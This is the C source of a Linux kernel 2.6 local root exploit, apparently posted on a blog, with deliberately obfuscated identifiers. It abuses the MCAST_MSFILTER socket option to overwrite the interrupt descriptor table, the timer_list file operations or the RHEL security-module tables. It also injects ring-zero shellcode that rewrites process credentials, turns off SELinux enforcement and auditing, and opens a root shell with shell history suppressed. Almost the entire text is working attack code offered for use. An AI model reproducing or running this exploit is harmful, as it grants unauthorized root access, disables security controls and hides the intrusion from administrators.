#define BANNER "Ac1dB1tCh3z VS Linux kernel 2.6 kernel\n"

#define KALLSYMS              "/proc/kallsyms"
#define TMAGIC_66TDFDRTS      "/proc/timer_list"
#define SELINUX_PATH          "/selinux/enforce"
#define RW_FOPS               "timer_list_fops"
#define PER_C_DHHDYDGTREM7765 "per_cpu__current_task"
#define PREPARE_GGDTSGFSRFSD  "prepare_creds"
#define OVERRIDE_GGDTSGFSRFSD "override_creds"
#define REVERT_DHDGTRRTEFDTD  "revert_creds"
#define Y0Y0SMAP 0x100000UL
#define Y0Y0CMAP 0x200000UL
#define Y0Y0STOP (Y0Y0SMAP+0xFFC)
#define J0J0S 0x00200000UL
#define J0J0R00T 0x002000F0UL
#define PAGE_SIZE 0x1000
#define KERN_DHHDYTMLADSFPYT 0x1
#define KERN_DGGDYDTEGGETFDRLAK 0x2
#define KERN_HHSYPPLORQTWGFD 0x4
#define KERN_DIS_GGDYYTDFFACVFD_IDT 0x8
#define KERN_DIS_DGDGHHYTTFSR34353_FOPS 0x10
#define KERN_DIS_GGDHHDYQEEWR4432PPOI_LSM 0x20
#define KERN_DIS_GGSTEYGDTREFRET_SEL1NUX 0x40
#define isRHHGDPPLADSF(ver) (strstr(ver, ".el4") || strstr(ver,".el5"))
#define TRY_REMAP_DEFAULT 1

#define __gggdfstsgdt_dddex(f, a...) do { fprintf(stdout, f, ## a); } while(0)
#define __pppp_tegddewyfg(s) do { fprintf(stdout, "%s", s); } while(0)
#define __xxxfdgftr_hshsgdt(s) do { perror(s); exit(-1); } while(0)
#define __yyy_tegdtfsrer(s) do { fprintf(stderr, s); exit(-1); } while(0)

static char buffer[1024];
static int s;
static int flags=0;
volatile static socklen_t magiclen=0;
static int useidt=0, usefops=0, uselsm=0;
static __yyrhdgdtfs66ytgetrfd _m_fops=0,_m_cred[3] = {0,0,0};
static __dgdhdytrg55 _m_cpu_off=0;
static char krelease[64];
static char kversion[128];

#define R0C_0FF 14

static char ttrg0ccc[]=
"\x51\x57\x53\x56\x48\x31\xc9\x48\x89\xf8\x48\x31\xf6\xbe\x41\x41\x41\x41"
"\x3b\x30\x75\x1f\x3b\x70\x04\x75\x1a\x3b\x70\x08\x75\x15\x3b\x70\x0c"
"\x75\x10\x48\x31\xdb\x89\x18\x89\x58\x04\x89\x58\x08\x89\x58\x0c\xeb\x11"
"\x48\xff\xc0\x48\xff\xc1\x48\x81\xf9\x4c\x04\x00\x00\x74\x02"
"\xeb\xcc\x5e\x5b\x5f\x59\xc3";
#define R0YTTTTUHLFSTT_OFF1 5
#define R0YGGSFDARTDF_DHDYTEGRDFD_D 21
#define R0TDGFSRSLLSJ_SHSYSTGD 45

char r1ngrrrrrrr[]=
"\x53\x52\x57\x48\xbb\x41\x41\x41\x41\x41\x41\x41\x41\xff\xd3"
"\x50\x48\x89\xc7\x48\xbb\x42\x42\x42\x42\x42\x42\x42\x42"
"\xff\xd3\x48\x31\xd2\x89\x50\x04\x89\x50\x14\x48\x89\xc7"
"\x48\xbb\x43\x43\x43\x43\x43\x43\x43\x43"
"\xff\xd3\x5f\x5f\x5a\x5b\xc3";

#define RJMPDDTGR_OFF 13
#define RJMPDDTGR_DHDYTGSCAVSF 7
#define RJMPDDTGR_GDTDGTSFRDFT 25

static char ttrfd0[]=
"\x57\x50\x65\x48\x8b\x3c\x25\x00\x00\x00\x00"
"\x48\xb8\x41\x41\x41\x41\x41\x41\x41\x41\xff\xd0"
"\x58\x5f"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\xc3";

/* implement selinux bypass for IDT */
#define RJMPDDTGR_OFF_IDT 14
#define RJMPDDTGR_DYHHTSFDARE 8
#define RJMPDDTGR_DHDYSGTSFDRTAC_SE 27

static char ruujhdbgatrfe345[]=
"\x0f\x01\xf8\x65\x48\x8b\x3c\x25\x00\x00\x00\x00"
"\x48\xb8\x41\x41\x41\x41\x41\x41\x41\x41\xff\xd0"
"\x0f\x01\xf8"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x48\xcf";

#define CJE_4554TFFDTRMAJHD_OFF 10
#define RJMPDDTGR_AYYYDGTREFCCV7761_OF 23

static char dis4blens4sel1nuxhayettgdr64545[]=
"\x41\x52\x50"
"\xb8\x00\x00\x00\x00"
"\x49\xba\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x89\x02"
"\x49\xba\x42\x42\x42\x42\x42\x42\x42\x42"
"\x41\x89\x02"
"\x58\x41\x5a";

/* rhel LSM stuffs */
#define RHEL_LSM_OFF 98

struct LSM_rhel {
  __yyrhdgdtfs66ytgetrfd selinux_ops;
  __yyrhdgdtfs66ytgetrfd capability_ops;
  __yyrhdgdtfs66ytgetrfd dummy_security_ops;
  __yyrhdgdtfs66ytgetrfd selinux_enforcing;
  __yyrhdgdtfs66ytgetrfd audit_enabled;
  const char *krelease;
  const char *kversion;
};

struct LSM_rhel known_targets[4]= {
  {
    0xffffffff8031e600ULL,
    0xffffffff8031fec0ULL,
    0xffffffff804acc00ULL,
    0xffffffff804af960ULL,
    0xffffffff8049b124ULL,

    "2.6.18-164.el5",
    "#1 SMP Thu Sep 3 03:28:30 EDT 2009"  // to manage minor/bug fix changes
  },
  {
   0xffffffff8031f600ULL,
   0xffffffff80320ec0ULL,
   0xffffffff804afc00ULL,
   0xffffffff804b2960ULL,
   0xffffffff8049e124ULL,

   "2.6.18-164.11.1.el5",
   "#1 SMP Wed Jan 6 13:26:04 EST 2010"
  },
  {
    0xffffffff805296a0ULL,
    0xffffffff8052af60ULL,
    0xffffffff806db1e0ULL,
    0xffffffff806ddf40ULL,
    0xffffffff806d5324ULL,
    "2.6.18-164.11.1.el5xen",
    "#1 SMP Wed Jan 20 08:06:04 EST 2010"   // default xen
  },
  {
    0xffffffff8031f600ULL,// d selinux_ops
    0xffffffff80320ec0ULL,// d capability_ops
    0xffffffff804afc00ULL,// B dummy_security_ops
    0xffffffff804b2960ULL,// B selinux_enforcing
    0xffffffff8049e124ULL,// B audit_enabled
    "2.6.18-164.11.1.el5",
    "#1 SMP Wed Jan 20 07:32:21 EST 2010" // tripwire target LoL
   }
};

static struct LSM_rhel *curr_target=NULL, dyn4nt4n1labeggeyrthryt;
struct socketcallAT {
  int s;
  int level;
  int optname;
  void *optval;
  volatile socklen_t *optlen;
} __attribute__((packed));

struct idt64from32_s {
  unsigned short limit;
  unsigned long base;
} __attribute__((packed));

static __yyrhdgdtfs66ytgetrfd getidt() {
  struct idt64from32_s idt;
  memset(&idt, 0x00, sizeof(struct idt64from32_s));
  asm volatile("sidt %0" : "=m"(idt));
  return idt.base | 0xFFFFFFFF00000000ULL;
}

static int isSelinuxEnabled() {
  FILE *selinux_f;
  selinux_f = fopen(SELINUX_PATH, "r");
  if(selinux_f == NULL) {
    if(errno == EPERM)
      return 1;
    else
     return 0;
  }
  fclose(selinux_f);
  return 1;
}

static int wtfyourunhere_heee(char *out_release, char* out_version) {
 int ret; const char*ptr;
 int count=0;
 char r[32], *bptr;
 struct utsname buf;
 ret =  uname(&buf);
 if(ret < 0)
   return -1;
 strcpy(out_release, buf.release);
 strcpy(out_version, buf.version);
 ptr = buf.release;
 bptr = r;
 memset(r, 0x00, sizeof(r));
 while(*ptr)
 {
   if(count == 2)
    {
      if(*ptr >= '0' && *ptr <= '9')
        *bptr++ = *ptr;
      else
        break;
    }
   if(*ptr == '.')
     count++;
   ptr++;
 }
 if(strlen(r) < 1 || !atoi(r))
   return -1;
 return atoi(r);
}

static void p4tch_sel1nux_codztegfaddczda(struct LSM_rhel *table)
{
*((__yyrhdgdtfs66ytgetrfd *)(dis4blens4sel1nuxhayettgdr64545 + CJE_4554TFFDTRMAJHD_OFF)) = table->selinux_enforcing;
*((__yyrhdgdtfs66ytgetrfd *)(dis4blens4sel1nuxhayettgdr64545 + RJMPDDTGR_AYYYDGTREFCCV7761_OF)) = table->audit_enabled;
__dhdyetgdfstreg__(ttrfd0 + RJMPDDTGR_GDTDGTSFRDFT, dis4blens4sel1nuxhayettgdr64545, 

sizeof(dis4blens4sel1nuxhayettgdr64545)-1);
__dhdyetgdfstreg__(ruujhdbgatrfe345 + RJMPDDTGR_DHDYSGTSFDRTAC_SE, dis4blens4sel1nuxhayettgdr64545, 

sizeof(dis4blens4sel1nuxhayettgdr64545)-1);
}

static __yyrhdgdtfs66ytgetrfd get_sym_ex(const char* s, const char* filename, int ignore_flag) {
  FILE *ka;
  char line[512];
  char reloc_a[64];
  char reloc[64];
  if(!(flags & KERN_HHSYPPLORQTWGFD) && !ignore_flag)
    return 0;
  ka = fopen(filename, "r");
  if(!ka)
    return 0;
  while(fgets(line, 512, ka) != NULL) {
    char *l_p  = line;
    char *ra_p = reloc_a;
    char *r_p    = reloc;
    memset(reloc, 0x00, sizeof(reloc));
    memset(reloc_a, 0x00, sizeof(reloc_a));
    while(*l_p != ' ' && (ra_p - reloc_a)  < 64)
      *ra_p++ = *l_p++;
    l_p += 3;
    while(*l_p != ' ' && *l_p != '\n' && *l_p != '\t' && (r_p - reloc) < 64)
      *r_p++ = *l_p++;
    if(!strcmp(reloc, s)) {
      __gggdfstsgdt_dddex("OK! %s->%s\n", s, reloc_a);
      return strtoull(reloc_a, NULL, 16);
    }
  }
  return 0;
}

static inline __yyrhdgdtfs66ytgetrfd get_sym(const char* s) {
  return get_sym_ex(s, KALLSYMS, 0);
}

static int parse_cred(const char* val) {
  int i=0;
  const char* p = val;
  char local[64], *l;
  for(i=0; i<3; i++)  {
    memset(local, 0x00, sizeof(local));
    l = local;
    while(*p && *p != ',')
      *l++ = *p++;
    if(!(*p) && i != 2)
      return -1;
    _m_cred[i] = strtoull(local, NULL, 16);
    p++;
  }
  return 0;
}

#define SELINUX_OPS        "selinux_ops"
#define DUMMY_SECURITY_OPS "dummy_security_ops"
#define CAPABILITY_OPS     "capability_ops"
#define SELINUX_ENFORCING  "selinux_enforcing"
#define AUDIT_ENABLED      "audit_enabled"

struct LSM_rhel *lsm_rhel_find_target(int check_rhel) {
   int i;
   char mapbuf[128];
   struct LSM_rhel *lsm = &(known_targets[0]);
   if(check_rhel && !isRHHGDPPLADSF(krelease)) {
     __pppp_tegddewyfg("N0t a RHEL k3rn3l! \n");
     return NULL;
   }
   __pppp_tegddewyfg("L00k1ng f0r kn0wn t4rg3tz\n");
   for(i=0; i<sizeof(known_targets)/sizeof(struct LSM_rhel); i++, lsm++) {
     if(!strcmp(krelease, lsm->krelease) && !strcmp(kversion, lsm->kversion)) {
       __gggdfstsgdt_dddex("Th1z 1z good as rooted. kn0wn t4rg3t: %s %s \n", lsm->krelease, lsm->kversion);
       return lsm;
     }
   }
   __pppp_tegddewyfg("c0mput3r 1z aqu1r1ng n3w t4rg3t\n");
   strcpy(mapbuf, "/boot/System.map-");
   strcat(mapbuf, krelease);

   dyn4nt4n1labeggeyrthryt.selinux_ops        = get_sym_ex(SELINUX_OPS, mapbuf, 1);
   dyn4nt4n1labeggeyrthryt.dummy_security_ops = get_sym_ex(DUMMY_SECURITY_OPS, mapbuf, 1);
   dyn4nt4n1labeggeyrthryt.capability_ops     = get_sym_ex(CAPABILITY_OPS, mapbuf, 1);
   dyn4nt4n1labeggeyrthryt.selinux_enforcing  = get_sym_ex(SELINUX_ENFORCING, mapbuf, 1);
   dyn4nt4n1labeggeyrthryt.audit_enabled      = get_sym_ex(AUDIT_ENABLED, mapbuf, 1);

   if(!dyn4nt4n1labeggeyrthryt.selinux_ops || !dyn4nt4n1labeggeyrthryt.dummy_security_ops ||
      !dyn4nt4n1labeggeyrthryt.capability_ops || !dyn4nt4n1labeggeyrthryt.selinux_enforcing ||
      !dyn4nt4n1labeggeyrthryt.audit_enabled)
    return NULL;
   return &dyn4nt4n1labeggeyrthryt;
}

static void put_your_hands_up_hooker(int argc, char *argv[]) {
  int fd,ver,ret;
  char __b[16];
  fd = open(KALLSYMS, O_RDONLY);
  ret = read(fd, __b, 16); // dummy read
  if((fd >= 0 && ret > 0)) {
    __pppp_tegddewyfg("Kallsyms +r\t\n");
    flags |= KERN_HHSYPPLORQTWGFD;
  }
  close(fd);
  ver = wtfyourunhere_heee(krelease, kversion);
  if(ver < 0)
    __yyy_tegdtfsrer("Un4bl3 t0 g3t r3l3as3!\n");
  __gggdfstsgdt_dddex("K3rn3l r3l3as3: %s\n", krelease);
  if(argc != 1) {
    while( (ret = getopt(argc, argv, "siflc:k:o:")) > 0) {
      switch(ret) {
        case 'i':
          flags |= KERN_DIS_GGDHHDYQEEWR4432PPOI_LSM|KERN_DIS_DGDGHHYTTFSR34353_FOPS;
          useidt=1; // u have to use -i to force IDT Vector
          break;
        case 'f':
          flags |= KERN_DIS_GGDHHDYQEEWR4432PPOI_LSM|KERN_DIS_GGDYYTDFFACVFD_IDT;
          break;
	case 'l':
	  flags |= KERN_DIS_GGDYYTDFFACVFD_IDT|KERN_DIS_DGDGHHYTTFSR34353_FOPS;
	  break;
        case 'c':
          if(!optarg || parse_cred(optarg) < 0)
              __yyy_tegdtfsrer("Un4bl3 t0 p4s3 cr3d c0d3z\n");
          break;
        case 'k':
          if(optarg)
            _m_fops = strtoull(optarg, NULL, 16);
          else
	     __yyy_tegdtfsrer("Un4bl3 t0 p4rs3 f0P numb3rs\n");
          break;
        case 's':
          if(!isSelinuxEnabled())
            __pppp_tegddewyfg("s3l1nux 1z n0t 3n4bl3d!\n");
          else
            flags |= KERN_DIS_GGSTEYGDTREFRET_SEL1NUX;
          break;
        case 'o':
          if(optarg)
            _m_cpu_off = strtoull(optarg, NULL, 16);
	  else
	    __yyy_tegdtfsrer("Un4bl3 t0 p4rs3 f0p c0mput3r numb3rs\n");
          break;
      }
    }
  }
  if(ver >= 29) // needs cred structure
  {
    flags |= KERN_DGGDYDTEGGETFDRLAK;
    if(!_m_cred[0] || !_m_cred[1] || !_m_cred[2]) {
      _m_cred[0] = get_sym(PREPARE_GGDTSGFSRFSD);
      _m_cred[1] = get_sym(OVERRIDE_GGDTSGFSRFSD);
      _m_cred[2] = get_sym(REVERT_DHDGTRRTEFDTD);
    }
    if(!_m_cred[0] || !_m_cred[1] || !_m_cred[2]) {
      __yyy_tegdtfsrer("Err0r 1n s3tt1ng cr3d sh3llc0d3z\n");
    }
    __pppp_tegddewyfg("Kernel Credentials detected\n");
    *((__yyrhdgdtfs66ytgetrfd *)(r1ngrrrrrrr + R0YTTTTUHLFSTT_OFF1)) = _m_cred[0];
    *((__yyrhdgdtfs66ytgetrfd *)(r1ngrrrrrrr + R0YGGSFDARTDF_DHDYTEGRDFD_D)) = _m_cred[1];
    *((__yyrhdgdtfs66ytgetrfd *)(r1ngrrrrrrr + R0TDGFSRSLLSJ_SHSYSTGD)) = _m_cred[2];
  }
  if(ver >= 30)  // needs cpu offset
  {
    flags |= KERN_DHHDYTMLADSFPYT;
    if(!_m_cpu_off)
    _m_cpu_off = (__dgdhdytrg55)get_sym(PER_C_DHHDYDGTREM7765);
    if(!_m_cpu_off)
      __yyy_tegdtfsrer("Err0r s3tt1ng up cr3d sh3llc0d3z\n");
    __pppp_tegddewyfg("K3rn3l per_cpu r3l0cs 3n4bl3d!\t\n");
    *((__dgdhdytrg55 *)(ttrfd0 + RJMPDDTGR_DHDYTGSCAVSF)) = _m_cpu_off;
    *((__dgdhdytrg55 *)(ruujhdbgatrfe345 + RJMPDDTGR_DYHHTSFDARE)) = _m_cpu_off;
  }
}

static void env_prepare(int argc, char* argv[]) {
  put_your_hands_up_hooker(argc, argv);
  if(!(flags & KERN_DIS_DGDGHHYTTFSR34353_FOPS))  {// try fops
    __pppp_tegddewyfg("Trying the F0P m3th34d\n");
    if(!_m_fops)
      _m_fops = get_sym(RW_FOPS);
    if(_m_fops) {
      usefops=1;
      __pppp_tegddewyfg("chose attack vector F0Ps\n");
    }
  }
  if(!usefops && !(flags & KERN_DIS_GGDHHDYQEEWR4432PPOI_LSM)) {// try lsm(rhel)
    curr_target = lsm_rhel_find_target(1);
    if(!curr_target) {
       __pppp_tegddewyfg("u4bl3 t0 f1nd t4rg3t!? W3'll s33 ab0ut th4t!\n");
    }
    else
      uselsm=1;
  }
  if(useidt && (flags & KERN_DIS_GGSTEYGDTREFRET_SEL1NUX)) {
    // -i flag
    curr_target = lsm_rhel_find_target(0);
    if(!curr_target)
    {
       __pppp_tegddewyfg("Un4lb3 t0 f1nd t4rg3t: c0ntinu3ing w1th0ut s3linsux d1s4bl3d.\n");
       flags &= ~KERN_DIS_GGSTEYGDTREFRET_SEL1NUX;
    }
  }
  if(!usefops && !useidt && !uselsm)
  __yyy_tegdtfsrer("3v3ryth3ng f41l3d!! try an0th3r sploit\n");
}

static inline int get_socklen(__yyrhdgdtfs66ytgetrfd addr, __dgdhdytrg55 stack) {
  int socklen_l = 8 + stack - addr - 16;
  return socklen_l;
}

static struct socketcallAT at;
static __dgdhdytrg55 idtover[4] =
             {0x00100000UL,
              0x0020ee00UL,
              0x00000000UL,
              0x00000000UL};

static void fillsocketcallAT() {
 at.s = s;
 at.level = SOL_IP;
 at.optname = MCAST_MSFILTER;
 at.optval = buffer;
 at.optlen = &magiclen;
}

static void bitch_call(struct socketcallAT *at, void *stack) {
  asm volatile(
      "push %%ebx\t\n"
      "push %%esi\t\n"
      "push %%ecx\t\n"
      "push %%edx\t\n"
      "movl $0x66, %%eax\t\n"
      "movl $0xf, %%ebx\t\n"
      "movl %%esp, %%esi\t\n"
      "movl %0, %%ecx\t\n"
      "movl %1, %%esp\t\n"
      "int $0x80\t\n"
      "movl %%esi, %%esp\t\n"
      "pop %%edx\t\n"
      "pop %%ecx\t\n"
      "pop %%esi\t\n"
      "pop %%ebx\t\n"
      :  : "r"(at), "r"(stack)  : "memory", "eax", "ecx", "ebx", "esi"
     );
}

static void __setmcbuffer(__dgdhdytrg55 value) {
  int i;
  __dgdhdytrg55 *p = (__dgdhdytrg55*)buffer;
  for(i=0; i<sizeof(buffer)/sizeof(void*); i++)
    *(p+i) = value;
}

static void idt_smash(__yyrhdgdtfs66ytgetrfd idtbase) {
  int i;
  __dgdhdytrg55 curr;
  for(i=0; i<sizeof(idtover)/sizeof(idtover[0]);i++) {
    curr = idtover[i];
    __setmcbuffer(curr);
    magiclen =  get_socklen(idtbase + (i*4), Y0Y0STOP);
    bitch_call(&at, (void*)Y0Y0STOP);
  }
}

static void y0y0stack() {
  void* map = mmap((void*)Y0Y0SMAP,PAGE_SIZE,PROT_READ|PROT_WRITE,MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED,-1,0);
  if(MAP_FAILED == map)
    __xxxfdgftr_hshsgdt("mmap");
}

static void y0y0code() {
void* map = mmap((void*)Y0Y0CMAP,PAGE_SIZE,
#ifdef TRY_REMAP_DEFAULT
PROT_READ|PROT_WRITE,
#else
PROT_READ|PROT_WRITE|PROT_EXEC,
#endif
MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED,-1,0);
if(MAP_FAILED == map)
__xxxfdgftr_hshsgdt("mmap");
}

static int rey0y0code(unsigned long old) {
  int fd;
  void *map;
  volatile char wizard;
  char cwd[1024];
  getcwd(cwd, sizeof(cwd));
  strcat(cwd, "/__tmpfile");
  unlink(cwd);
  fd = open(cwd, O_RDWR|O_CREAT, S_IRWXU);
  if(fd < 0)
    return -1;
  write(fd, (const void*)old, PAGE_SIZE);
  if(munmap((void*)old, PAGE_SIZE) < 0)
    return -1;
  map = mmap((void*)old,PAGE_SIZE,PROT_READ|PROT_EXEC,MAP_PRIVATE|MAP_FIXED,fd,0);
  if(map == MAP_FAILED)
  return -1;
  wizard = *((char*)old);
  unlink(cwd);
  return wizard;
}

int main(int argc, char*argv[]) {
  int uid,fd;
  __yyrhdgdtfs66ytgetrfd *patch, idtb;
  struct pollfd pfd;
  printf(BANNER);
  uid = getuid();
  env_prepare(argc, argv);
  y0y0stack();
  y0y0code();
  if(useidt) {
    idtb = getidt();
    __gggdfstsgdt_dddex("b4s3 addr3ss: %llx\n", idtb);
    __pppp_tegddewyfg("Bu1ld1ng r1ng0 sh3llc0de - IDT\n");
    patch = (__yyrhdgdtfs66ytgetrfd*)(ruujhdbgatrfe345 + RJMPDDTGR_OFF_IDT);
    *patch = (__yyrhdgdtfs66ytgetrfd)(J0J0R00T);
    __pppp_tegddewyfg("Prepare: m0rn1ng w0rk0ut\n");
    if(flags & KERN_DIS_GGSTEYGDTREFRET_SEL1NUX) {
      __pppp_tegddewyfg("add1ng sp3c14l c0de t0 rem0v3 s3linux\n");
      p4tch_sel1nux_codztegfaddczda(curr_target);
    }
    __dhdyetgdfstreg__((void*)J0J0S,  ruujhdbgatrfe345, sizeof(ruujhdbgatrfe345));
  } else if(usefops || uselsm) {
    __pppp_tegddewyfg("Bu1ld1ng r1ng0 sh3llc0d3 - F0PZzzZzZZ/LSD(M)\n");
    patch = (__yyrhdgdtfs66ytgetrfd*)(ttrfd0 + RJMPDDTGR_OFF);
    *patch = (__yyrhdgdtfs66ytgetrfd)(J0J0R00T);
    __setmcbuffer(J0J0S);
    __pppp_tegddewyfg("Prepare: m0rn1ng w0rk0ut\n");
    if(uselsm && (flags & KERN_DIS_GGSTEYGDTREFRET_SEL1NUX)) {
    __pppp_tegddewyfg("add1ng sp3c14l c0de t0 rem0v3 s3linux\n");
    p4tch_sel1nux_codztegfaddczda(curr_target);
    }
    __dhdyetgdfstreg__((void*)J0J0S, ttrfd0, sizeof(ttrfd0));
  }
  if(flags & KERN_DGGDYDTEGGETFDRLAK) {
    __pppp_tegddewyfg("Us1ng cr3d s3ash3llc0d3z\n");
    __dhdyetgdfstreg__((void*)J0J0R00T, r1ngrrrrrrr, sizeof(r1ngrrrrrrr));
  } else {
    __pppp_tegddewyfg("Us1ng st4nd4rd s3ash3llz\n");
    __dhdyetgdfstreg__((void*)J0J0R00T,  ttrg0ccc, sizeof(ttrg0ccc));
    *((unsigned int*)(J0J0R00T + R0C_0FF)) = uid;
  }
  __pppp_tegddewyfg("0p3n1ng th3 m4giq p0rt\n");
  s = socket(AF_INET, SOCK_DGRAM, 0);
  if(s < 0)
  __xxxfdgftr_hshsgdt("socket");
  fillsocketcallAT();
#ifdef TRY_REMAP_DEFAULT
  if(rey0y0code(Y0Y0CMAP) < 0)
    __yyy_tegdtfsrer("Un4bl3 t0 r3m4p sh1t\t\n");
#endif
  if(useidt) {
    __yyrhdgdtfs66ytgetrfd idtentry = idtb + (2*sizeof(__yyrhdgdtfs66ytgetrfd)*0xdd);
    __gggdfstsgdt_dddex("Us1ng 1dt 3ntry: %d\n", 0xdd);
    idt_smash((idtentry));
    sleep(1);
    asm volatile("int $0xdd\t\n");
  } else if(usefops) {
    magiclen = get_socklen(_m_fops, Y0Y0STOP);
    magiclen -= 7*sizeof(__yyrhdgdtfs66ytgetrfd);
    __gggdfstsgdt_dddex("m4q1c p0rt4l l3n f0und: 0x%x\n", magiclen);
    __pppp_tegddewyfg("Killin f0ps\n");
    bitch_call(&at, (void*)Y0Y0STOP);
    sleep(1);
    fd = open(TMAGIC_66TDFDRTS, O_RDONLY);
    if(fd < 0)
    __xxxfdgftr_hshsgdt("fuq t1m3r_l1st");
    pfd.fd = fd;
    pfd.events = POLLIN | POLLOUT;
    poll(&pfd, 1, 0);
  } else if(uselsm) {
    int msqid;
    __yyrhdgdtfs66ytgetrfd selinux_msg_off = curr_target->selinux_ops + (8*RHEL_LSM_OFF);
    __yyrhdgdtfs66ytgetrfd dummy_msg_off   = curr_target->dummy_security_ops + (8*RHEL_LSM_OFF);
    __yyrhdgdtfs66ytgetrfd capability_msg_off = curr_target->capability_ops + (8*RHEL_LSM_OFF);
    msqid = msgget(0, IPC_PRIVATE|0600);
    if(msqid < 0)
      __xxxfdgftr_hshsgdt("fuq!");
    magiclen =  get_socklen(selinux_msg_off, Y0Y0STOP);
    __setmcbuffer(J0J0S);
    bitch_call(&at, (void*)Y0Y0STOP);
    magiclen = get_socklen(selinux_msg_off+4, Y0Y0STOP);
    __setmcbuffer(0);
    bitch_call(&at, (void*)Y0Y0STOP);
    magiclen =  get_socklen(dummy_msg_off, Y0Y0STOP);
    __setmcbuffer(J0J0S);
    bitch_call(&at, (void*)Y0Y0STOP);
    magiclen =  get_socklen(dummy_msg_off+4, Y0Y0STOP);
    __setmcbuffer(0);
    bitch_call(&at, (void*)Y0Y0STOP);
    magiclen =  get_socklen(capability_msg_off, Y0Y0STOP);
    __setmcbuffer(J0J0S);
    bitch_call(&at, (void*)Y0Y0STOP);
    magiclen =  get_socklen(capability_msg_off+4, Y0Y0STOP);
    __setmcbuffer(0);
    bitch_call(&at, (void*)Y0Y0STOP);
    msgctl(msqid, IPC_RMID, (struct msqid_ds *) NULL); // exploit it here
  }
  munmap((void*)Y0Y0CMAP, PAGE_SIZE);
  if(getuid() == 0) {
    pid_t pid;
    __pppp_tegddewyfg("[!] got root\n");
    pid = fork();
    if(pid == 0)
    {
      char *args[] = {"/bin/sh", "-i", NULL};
      char *envp[] = {"TERM=linux", "BASH_HISTORY=/dev/null", "HISTORY=/dev/null", "history=/dev/null", "HISTFILE=/dev/null", 

"HISTFILESIZE=0","PATH=/bin:/sbin:/usr/sbin:/usr/bin:/usr/local/bin:/usr/local/sbin", NULL };
      execve("/bin/sh", args, envp);
    } else {
      int status;
      waitpid(pid, &status, 0);
    }
  }
  else
    __pppp_tegddewyfg("[-] exploit failed!\n");
  close(s);
  return 0;
}

….thankgod the nightmare is over…

comments: 1 » tags: